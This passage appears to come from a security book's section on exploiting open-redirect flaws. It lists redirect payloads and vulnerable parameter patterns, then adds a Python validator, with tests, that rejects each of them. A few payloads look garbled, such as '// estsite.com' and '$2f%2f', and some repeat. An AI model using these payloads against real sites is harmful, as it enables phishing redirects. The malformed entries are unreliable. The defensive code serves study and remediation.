Exploitation

Open redirects are not complex to exploit. Once you have confirmed the vulnerability, you only need to insert the destination into the request. The following are the most common redirect values that you could insert in an open redirect vulnerability:

  • /%09/testsite.com
  • /%5ctestsite.com
  • //www.testsite.com/%2f%2e%2e
  • //www.testsite.com/%2e%2e
  • //testsite.com/
  • //testsite.com/%2f..
  • // estsite.com
  • /victim.com:80%40testsite.com

I also recommend you exploit the following parameters; just inject the destination in place of the {target} value:

  • ?url=http://{target}
  • ?url=https://{target}
  • ?next=http://{target}
  • ?next=https://{target}
  • ?url=https://{target}
  • ?url=http://{target}
  • ?url=//{target}
  • ?url=$2f%2f{target}
  • ?next=//{target}
  • ?next=$2f%2f{target}
  • ?url=//{target}
  • ?url=$2f%2f{target}
  • ?url=//{target}
  • /redirect/{target}
  • /cgi-bin/redirect.cgi?{target}
  • /out/{target}
  • /out?{target}
  • /out?/{target}
  • /out?//{target}
  • /out?/{target}
  • /out?///{target}
  • ?view={target}
  • ?view=/{target}
  • ?view=//{target}
  • ?view=/{target}
  • ?view=///{target}
  • /login?to={target}
  • /login?to=/{target}
  • /login?to=//{target}
  • /login?to=/{target}
  • /login?to=///{target}
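
Each entry in the two lists above works because the application and the browser parse the destination differently. The following Python check is an added example, not code from the book; it assumes the application's own hosts are victim.com and www.victim.com, and it refuses each of those forms:

```python
from urllib.parse import unquote, urlsplit

# Assumption for this example: the only hosts the application may redirect to.
ALLOWED_HOSTS = {"victim.com", "www.victim.com"}

def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for a local path or an http(s) URL on an allowed host."""
    decoded = target
    for _ in range(3):  # undo nested percent-encoding before checking
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    # Browsers drop tabs and newlines and treat "\" as "/", so "/%09/host"
    # and "/%5chost" both resolve like "//host". Refuse them outright.
    if "\\" in decoded or any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return False
    try:
        parts = urlsplit(decoded)
        host, user, password = parts.hostname, parts.username, parts.password
    except ValueError:
        return False
    if parts.scheme or parts.netloc:
        # Absolute URL: explicit http(s), allowlisted host, no userinfo
        # (blocks "victim.com:80@testsite.com"). Scheme-relative "//host"
        # has an empty scheme and is always refused.
        return (parts.scheme in ("http", "https") and host in allowed_hosts
                and user is None and password is None)
    # Local path: exactly one leading slash ("///host" is also off-site).
    if not decoded.startswith("/") or decoded.startswith("//"):
        return False
    # Conservative choice of this example: refuse "@" in the first segment,
    # which would become userinfo if a later layer prepended a scheme.
    return "@" not in parts.path.split("/", 2)[1]

# Constructed from the lists above, with {target} filled in as testsite.com.
PAGE_PAYLOADS = [
    "/%09/testsite.com", "/%5ctestsite.com", "//www.testsite.com/%2f%2e%2e",
    "//www.testsite.com/%2e%2e", "//testsite.com/", "//testsite.com/%2f..",
    "// estsite.com", "/victim.com:80%40testsite.com",
    "http://testsite.com", "$2f%2ftestsite.com", "///testsite.com",
]

def rejected(payloads=PAGE_PAYLOADS):
    return [p for p in payloads if not is_safe_redirect(p)]

if __name__ == "__main__":
    for p in PAGE_PAYLOADS:
        print(f"{p!r:40} safe={is_safe_redirect(p)}")
```

Call `is_safe_redirect()` on the parameter value before issuing the redirect, and fall back to a fixed local page when it returns False.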